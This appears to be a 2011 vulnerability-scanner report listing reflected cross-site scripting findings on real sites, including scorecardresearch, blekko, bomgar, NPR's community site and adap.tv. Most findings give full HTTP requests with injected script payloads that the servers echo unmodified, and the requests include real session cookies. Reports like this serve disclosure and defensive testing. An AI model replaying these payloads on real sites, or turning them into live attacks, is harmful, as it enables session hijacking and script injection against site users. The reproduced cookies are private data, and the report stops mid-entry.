GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12005&c5=ba08c<script>alert(1)</script>3eeb0c57d13&c6=&c10=3212813&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Mon, 14 Mar 2011 01:47:07 GMT Date: Mon, 07 Mar 2011 01:47:07 GMT Connection: close Content-Length: 3594
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload ed75e<script>alert(1)</script>15cdaeb4955 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12005&c5=&c6=ed75e<script>alert(1)</script>15cdaeb4955&c10=3212813&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Mon, 14 Mar 2011 01:47:08 GMT Date: Mon, 07 Mar 2011 01:47:08 GMT Connection: close Content-Length: 3594
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13f03"><script>alert(1)</script>26e9f608a62 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 01:47:26 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 359 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89066"><script>alert(1)</script>3bb9319201a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 01:47:53 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 359 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e846f"><script>alert(1)</script>5513091fadf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 01:48:20 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 359 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aca2"><script>alert(1)</script>a396d432942 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 01:48:43 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 359 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da961"><script>alert(1)</script>aa909b82e8f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 01:49:11 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 358 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c26a"><script>alert(1)</script>210543f7078 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 01:49:45 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 351 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c414"><script>alert(1)</script>a626a591c0b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 01:44:05 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 368 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5345525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cda3b"><script>alert(1)</script>ce7cb4a1b8e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 01:44:33 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 368 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7029"><script>alert(1)</script>96491854817 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 01:45:00 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 368 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7299"><script>alert(1)</script>2cab2f1c0af was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 01:45:27 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 367 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aff3e"><script>alert(1)</script>8f270842d1b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 01:45:55 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 367 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a8c1"><script>alert(1)</script>73fad9bf007 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 01:46:29 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 359 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8113"><script>alert(1)</script>008009ecf9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 18:59:01 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 359 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9442e"><script>alert(1)</script>caf55ec555b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 18:59:06 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 359 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7deab"><script>alert(1)</script>3c3c43fbf6d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 18:59:12 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 359 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5345525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7c76"><script>alert(1)</script>3397761bfb1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 18:59:17 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 359 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f96d9"><script>alert(1)</script>b78bb1c3bd3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 18:59:22 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 357 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6d2b"><script>alert(1)</script>e47bee3f37c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 18:59:27 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 350 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/
The value of the query request parameter is copied into the HTML document as plain text between tags. The payload 3d73f<script>alert(1)</script>63bc5c45e1d was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /autocomplete?query=http%3A%2F%2Fxs+%2Fseo3d73f<script>alert(1)</script>63bc5c45e1d HTTP/1.1 Host: blekko.com Proxy-Connection: keep-alive Referer: http://blekko.com/ws/http:%2F%2Felbo.ws%2F+/seo X-Requested-With: XMLHttpRequest Accept: text/plain, */*; q=0.01 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sessionid=45305018; suggestedSlashtagsList=1; fbl=2; v=2
The value of REST URL parameter 3 is copied into an HTML comment. The payload 96591--><script>alert(1)</script>673695fb9b5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into an HTML comment. The payload 676d8--><a>4f71632b565 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 3 is copied into an HTML comment. The payload 19fe5--><script>alert(1)</script>81ca749855a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into an HTML comment. The payload b1276--><script>alert(1)</script>2f27a7397c8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ws/elbo.ws+/visualizeb1276--><script>alert(1)</script>2f27a7397c8 HTTP/1.1 Host: blekko.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: v=3; domainseo-tab=domaincont-2; t=1299508790128; suggestedSlashtagsList=1; sessionid=45305018; fbl=2;
The value of REST URL parameter 3 is copied into an HTML comment. The payload 5c199--><script>alert(1)</script>8d3c8e8979c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ws/http:%2F%2Fcloudscan.me+/seo5c199--><script>alert(1)</script>8d3c8e8979c HTTP/1.1 Host: blekko.com Proxy-Connection: keep-alive Referer: http://blekko.com/ws/http:%2F%2Fcloudscan.us+/seo Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sessionid=45305018; suggestedSlashtagsList=1; v=3; fbl=2; t=1299508790128
The value of REST URL parameter 3 is copied into an HTML comment. The payload b6468--><script>alert(1)</script>b2125480183 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ws/http:%2F%2Fcloudscan.us+/seob6468--><script>alert(1)</script>b2125480183 HTTP/1.1 Host: blekko.com Proxy-Connection: keep-alive Referer: http://blekko.com/ws/http:%2F%2Fxss.cx+/seo Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sessionid=45305018; suggestedSlashtagsList=1; fbl=2; v=3; t=1299508779576
The value of REST URL parameter 3 is copied into an HTML comment. The payload cc0e5--><script>alert(1)</script>557c4487d5b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ws/http:%2F%2Felbo.ws%2F+/seocc0e5--><script>alert(1)</script>557c4487d5b HTTP/1.1 Host: blekko.com Proxy-Connection: keep-alive Referer: http://blekko.com/ws/http://elbo.ws/+/visualize8d039--%3E%3Cscript%3Ealert(1)%3C/script%3E23bc12b73c2?&co=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sessionid=45305018; fbl=2; v=1; suggestedSlashtagsList=1
The value of REST URL parameter 3 is copied into an HTML comment. The payload 2d119--><script>alert(1)</script>cd9b01d6718 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ws/http:%2F%2Fxss.cx+/seo2d119--><script>alert(1)</script>cd9b01d6718 HTTP/1.1 Host: blekko.com Proxy-Connection: keep-alive Referer: http://blekko.com/ws/http:%2F%2Felbo.ws%2F+/seo Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sessionid=45305018; suggestedSlashtagsList=1; fbl=2; v=2; t=1299508761762
The value of REST URL parameter 5 is copied into an HTML comment. The payload 621ab--><script>alert(1)</script>e87cefc468f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into an HTML comment. The payload a97a6--><script>alert(1)</script>222caa3f0a5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into an HTML comment. The payload d4048--><script>alert(1)</script>a9a3a3e2e54 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into an HTML comment. The payload 8d039--><script>alert(1)</script>23bc12b73c2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 46c59<script>alert(1)</script>14300c00191 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /46c59<script>alert(1)</script>14300c00191 HTTP/1.1 Host: community.bomgar.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Mar 2011 12:03:23 GMT Server: Apache Set-Cookie: swl_bomgar_sess=8a53d406464e7e265306bdfd14ce9b18; path=/; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: swl_debug=deleted; expires=Mon, 08-Mar-2010 12:03:23 GMT; httponly Vary: Accept-Encoding Content-Length: 239 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /46c59<script>alert(1)</script>14300c00191 was not found on this server.</p> ...[SNIP]...
The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 853e1<script>alert(1)</script>8247c141a2c was submitted in the cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ver1.0/Direct/Jsonp?r=%7B%22Requests%22%3A%5B%7B%22DiscoverContentAction%22%3A%7B%22Activity%22%3A%7B%22Activity%22%3A%7B%22Name%22%3A%22Commented%22%7D%7D%2C%22Age%22%3A2%2C%22ContentType%22%3A%7B%22ContentType%22%3A%7B%22Name%22%3A%22Article%22%7D%7D%2C%22LimitToContributors%22%3A%5B%7B%22UserTier%22%3A%7B%22Name%22%3A%22Standard%22%7D%7D%5D%2C%22MaximumNumberOfDiscoveries%22%3A4%2C%22SearchCategories%22%3A%5B%7B%22Category%22%3A%7B%7D%7D%5D%2C%22SearchSections%22%3A%5B%7B%22Section%22%3A%7B%22Name%22%3A%22All%22%7D%7D%5D%7D%7D%2C%7B%22DiscoverContentAction%22%3A%7B%22Activity%22%3A%7B%22Activity%22%3A%7B%22Name%22%3A%22Recommended%22%7D%7D%2C%22Age%22%3A2%2C%22ContentType%22%3A%7B%22ContentType%22%3A%7B%22Name%22%3A%22Article%22%7D%7D%2C%22LimitToContributors%22%3A%5B%7B%22UserTier%22%3A%7B%22Name%22%3A%22Standard%22%7D%7D%5D%2C%22MaximumNumberOfDiscoveries%22%3A4%2C%22SearchCategories%22%3A%5B%7B%22Category%22%3A%7B%7D%7D%5D%2C%22SearchSections%22%3A%5B%7B%22Section%22%3A%7B%22Name%22%3A%22All%22%7D%7D%5D%7D%7D%5D%2C%22UniqueId%22%3A0%7D&cb=RequestBatch.callbacks.daapiCallback0853e1<script>alert(1)</script>8247c141a2c HTTP/1.1 Host: community.npr.org Proxy-Connection: keep-alive Referer: http://www.npr.org/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: plckarptnpr=R4181523433; GUID=00072D2E61F00D7544B182A361626364; LE1=j7MTD1+4mf4+31+5; LE2=j7MTD1+4Gc4+31+5; __gads=ID=fcdec54320c1d3ec:T=1299538425:S=ALNI_MZC3MrMfYZgHu4zHMiEHfmLb2rLJQ
The value of the as request parameter is copied into the HTML document as plain text between tags. The payload 98ac4<a>9babd9333ae was submitted in the as parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=398ac4<a>9babd9333ae&eov=fw5il5 HTTP/1.1 Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/swf/player.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the categories request parameter is copied into the HTML document as plain text between tags. The payload 2afc5<a>336ae514bdb was submitted in the categories parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory22afc5<a>336ae514bdb&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1 Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/swf/player.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the companionId request parameter is copied into the HTML document as plain text between tags. The payload bfcf8<a>990b97b465b was submitted in the companionId parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
